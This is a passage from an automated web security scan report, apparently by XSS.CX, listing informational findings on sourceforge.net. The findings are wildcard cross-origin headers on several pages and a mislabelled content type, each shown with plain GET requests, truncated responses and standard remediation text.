X-SFX-Webhead: sfs-web-22
Content-type: text/html
Connection: close
Date: Sat, 18 Jun 2011 01:38:21 GMT
Server: lighttpd/1.4.26
Content-Length: 8487

   <!doctype html>
<!--[if lt IE 7 ]> <html lang="en" class="no-js ie6"><![endif]-->
<!--[if IE 7 ]> <html lang="en" class="no-js ie7"><![endif]-->
<!--[if IE 8 ]> <html lang="en" class="no-js ie8
...[SNIP]...

5.3. http://sourceforge.net/mail/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://sourceforge.net
Path:   /mail/

Request

GET /mail/ HTTP/1.1
Host: sourceforge.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Access-Control-Allow-Origin: *
X-Powered-By: PHP/5.2.9
X-SFX-Webhead: sfs-web-24
Content-type: text/html
Connection: close
Date: Sat, 18 Jun 2011 01:38:25 GMT
Server: lighttpd/1.4.26
Content-Length: 8519

   <!doctype html>
<!--[if lt IE 7 ]> <html lang="en" class="no-js ie6"><![endif]-->
<!--[if IE 7 ]> <html lang="en" class="no-js ie7"><![endif]-->
<!--[if IE 8 ]> <html lang="en" class="no-js ie8
...[SNIP]...

5.4. http://sourceforge.net/mailarchive/forum.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://sourceforge.net
Path:   /mailarchive/forum.php

Request

GET /mailarchive/forum.php HTTP/1.1
Host: sourceforge.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Access-Control-Allow-Origin: *
X-Powered-By: PHP/5.2.9
X-SFX-Webhead: sfs-web-23
Content-type: text/html
Connection: close
Date: Sat, 18 Jun 2011 01:38:25 GMT
Server: lighttpd/1.4.26
Content-Length: 8448

   <!doctype html>
<!--[if lt IE 7 ]> <html lang="en" class="no-js ie6"><![endif]-->
<!--[if IE 7 ]> <html lang="en" class="no-js ie7"><![endif]-->
<!--[if IE 8 ]> <html lang="en" class="no-js ie8
...[SNIP]...

5.5. http://sourceforge.net/news/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://sourceforge.net
Path:   /news/

Request

GET /news/ HTTP/1.1
Host: sourceforge.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Access-Control-Allow-Origin: *
X-Powered-By: PHP/5.2.9
X-SFX-Webhead: sfs-web-22
Content-type: text/html
Connection: close
Date: Sat, 18 Jun 2011 01:38:21 GMT
Server: lighttpd/1.4.26
Content-Length: 8482

   <!doctype html>
<!--[if lt IE 7 ]> <html lang="en" class="no-js ie6"><![endif]-->
<!--[if IE 7 ]> <html lang="en" class="no-js ie7"><![endif]-->
<!--[if IE 8 ]> <html lang="en" class="no-js ie8
...[SNIP]...

5.6. http://sourceforge.net/project/project_donations.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://sourceforge.net
Path:   /project/project_donations.php

Request

GET /project/project_donations.php HTTP/1.1
Host: sourceforge.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Access-Control-Allow-Origin: *
X-Powered-By: PHP/5.2.9
X-SFX-Webhead: sfs-web-23
Content-type: text/html
Connection: close
Date: Sat, 18 Jun 2011 01:38:19 GMT
Server: lighttpd/1.4.26
Content-Length: 8486

   <!doctype html>
<!--[if lt IE 7 ]> <html lang="en" class="no-js ie6"><![endif]-->
<!--[if IE 7 ]> <html lang="en" class="no-js ie7"><![endif]-->
<!--[if IE 8 ]> <html lang="en" class="no-js ie8
...[SNIP]...

5.7. http://sourceforge.net/project/screenshots.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://sourceforge.net
Path:   /project/screenshots.php

Request

GET /project/screenshots.php HTTP/1.1
Host: sourceforge.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Access-Control-Allow-Origin: *
X-Powered-By: PHP/5.2.9
X-SFX-Webhead: sfs-web-24
Content-type: text/html
Connection: close
Date: Sat, 18 Jun 2011 01:38:20 GMT
Server: lighttpd/1.4.26
Content-Length: 8480

   <!doctype html>
<!--[if lt IE 7 ]> <html lang="en" class="no-js ie6"><![endif]-->
<!--[if IE 7 ]> <html lang="en" class="no-js ie7"><![endif]-->
<!--[if IE 8 ]> <html lang="en" class="no-js ie8
...[SNIP]...

5.8. http://sourceforge.net/project/stats/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://sourceforge.net
Path:   /project/stats/

Request

GET /project/stats/ HTTP/1.1
Host: sourceforge.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Access-Control-Allow-Origin: *
X-Powered-By: PHP/5.2.9
X-SFX-Webhead: sfs-web-22
Content-type: text/html
Connection: close
Date: Sat, 18 Jun 2011 01:38:20 GMT
Server: lighttpd/1.4.26
Content-Length: 8491

   <!doctype html>
<!--[if lt IE 7 ]> <html lang="en" class="no-js ie6"><![endif]-->
<!--[if IE 7 ]> <html lang="en" class="no-js ie7"><![endif]-->
<!--[if IE 8 ]> <html lang="en" class="no-js ie8
...[SNIP]...

5.9. http://sourceforge.net/project/stats/detail.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://sourceforge.net
Path:   /project/stats/detail.php

Request

GET /project/stats/detail.php HTTP/1.1
Host: sourceforge.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Access-Control-Allow-Origin: *
X-Powered-By: PHP/5.2.9
X-SFX-Webhead: sfs-web-21
Content-type: text/html
Connection: close
Date: Sat, 18 Jun 2011 01:38:20 GMT
Server: lighttpd/1.4.26
Content-Length: 8501

   <!doctype html>
<!--[if lt IE 7 ]> <html lang="en" class="no-js ie6"><![endif]-->
<!--[if IE 7 ]> <html lang="en" class="no-js ie7"><![endif]-->
<!--[if IE 8 ]> <html lang="en" class="no-js ie8
...[SNIP]...

5.10. http://sourceforge.net/scm/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://sourceforge.net
Path:   /scm/

Request

GET /scm/ HTTP/1.1
Host: sourceforge.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Access-Control-Allow-Origin: *
X-Powered-By: PHP/5.2.9
X-SFX-Webhead: sfs-web-24
Content-type: text/html
Connection: close
Date: Sat, 18 Jun 2011 01:38:25 GMT
Server: lighttpd/1.4.26
Content-Length: 8461

   <!doctype html>
<!--[if lt IE 7 ]> <html lang="en" class="no-js ie6"><![endif]-->
<!--[if IE 7 ]> <html lang="en" class="no-js ie7"><![endif]-->
<!--[if IE 8 ]> <html lang="en" class="no-js ie8
...[SNIP]...

5.11. http://sourceforge.net/search/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://sourceforge.net
Path:   /search/

Request

GET /search/ HTTP/1.1
Host: sourceforge.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Access-Control-Allow-Origin: *
X-Powered-By: PHP/5.2.9
X-SFX-Webhead: sfs-web-23
Set-Cookie: PHPSESSID=098d46b43f016162fdfd8d635678a9d2; expires=Sat, 02-Jul-2011 01:38:27 GMT; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-type: text/html
Connection: close
Date: Sat, 18 Jun 2011 01:38:27 GMT
Server: lighttpd/1.4.26
Content-Length: 80719

<!doctype html>
<!--[if lt IE 7 ]> <html lang="en" class="no-js ie6"><![endif]-->
<!--[if IE 7 ]> <html lang="en" class="no-js ie7"><![endif]-->
<!--[if IE 8 ]> <html lang="en" class="no-js ie8"
...[SNIP]...

5.12. http://sourceforge.net/tracker/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://sourceforge.net
Path:   /tracker/

Request

GET /tracker/ HTTP/1.1
Host: sourceforge.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Access-Control-Allow-Origin: *
X-Powered-By: PHP/5.2.9
X-SFX-Webhead: sfs-web-21
Content-type: text/html
Connection: close
Date: Sat, 18 Jun 2011 01:38:21 GMT
Server: lighttpd/1.4.26
Content-Length: 8485

   <!doctype html>
<!--[if lt IE 7 ]> <html lang="en" class="no-js ie6"><![endif]-->
<!--[if IE 7 ]> <html lang="en" class="no-js ie7"><![endif]-->
<!--[if IE 8 ]> <html lang="en" class="no-js ie8
...[SNIP]...

5.13. http://sourceforge.net/users/  previous

Summary

Severity:   Information
Confidence:   Certain
Host:   http://sourceforge.net
Path:   /users/

Request

GET /users/ HTTP/1.1
Host: sourceforge.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Access-Control-Allow-Origin: *
X-Powered-By: PHP/5.2.9
X-SFX-Webhead: sfs-web-24
Content-type: text/html
Connection: close
Date: Sat, 18 Jun 2011 01:38:20 GMT
Server: lighttpd/1.4.26
Content-Length: 8517

   <!doctype html>
<!--[if lt IE 7 ]> <html lang="en" class="no-js ie6"><![endif]-->
<!--[if IE 7 ]> <html lang="en" class="no-js ie7"><![endif]-->
<!--[if IE 8 ]> <html lang="en" class="no-js ie8
...[SNIP]...

6. Content type incorrectly stated  previous

Summary

Severity:   Information
Confidence:   Firm
Host:   http://sourceforge.net
Path:   /export/rss2_projnews.php

Issue detail

The response contains the following Content-type statement:The response states that it contains HTML. However, it actually appears to contain plain text.

Issue background

If a web response specifies an incorrect content type, then browsers may process the response in unexpected ways. If the specified content type is a renderable text-based format, then the browser will usually attempt to parse and render the response in that format. If the specified type is an image format, then the browser will usually detect the anomaly and will analyse the actual content and attempt to determine its MIME type. Either case can lead to unexpected results, and if the content contains any user-controllable data may lead to cross-site scripting or other client-side vulnerabilities.

In most cases, the presence of an incorrect content type statement does not constitute a security flaw, particularly if the response contains static content. You should review the contents of the response and the context in which it appears to determine whether any vulnerability exists.

Issue remediation

For every response containing a message body, the application should include a single Content-type header which correctly and unambiguously states the MIME type of the content in the response body.

Request

GET /export/rss2_projnews.php HTTP/1.1
Host: sourceforge.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Access-Control-Allow-Origin: *
X-Powered-By: PHP/5.2.9
X-SFX-Webhead: sfs-web-23
Content-Type: text/html
Connection: close
Date: Sat, 18 Jun 2011 01:38:19 GMT
Server: lighttpd/1.4.26
Content-Length: 70

An error occurred (bad group ID specified) during RSS feed generation.

Report generated by XSS.CX at Sat Jun 18 07:07:01 CDT 2011.